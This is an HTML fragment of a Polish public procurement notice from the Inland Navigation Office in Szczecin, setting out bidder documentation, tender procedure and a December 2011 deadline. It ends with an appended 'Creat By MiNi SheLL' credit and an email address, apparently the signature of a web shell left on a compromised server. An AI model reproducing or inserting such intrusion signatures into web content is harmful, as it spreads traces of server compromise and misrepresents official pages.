<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Odpowiednie pełnomocnictwa</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wroc.uzs.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Żeglugi Śródlądowej w Szczecinie, pl. Stefana Batorego 4, 70-207 Szczecin, pok. nr 18..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2011 godzina 09:00, miejsce: Urząd Żeglugi Śródlądowej w Szczecinie, pl. Stefana Batorego 4, 70-207 Szczecin, pok. nr 18..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com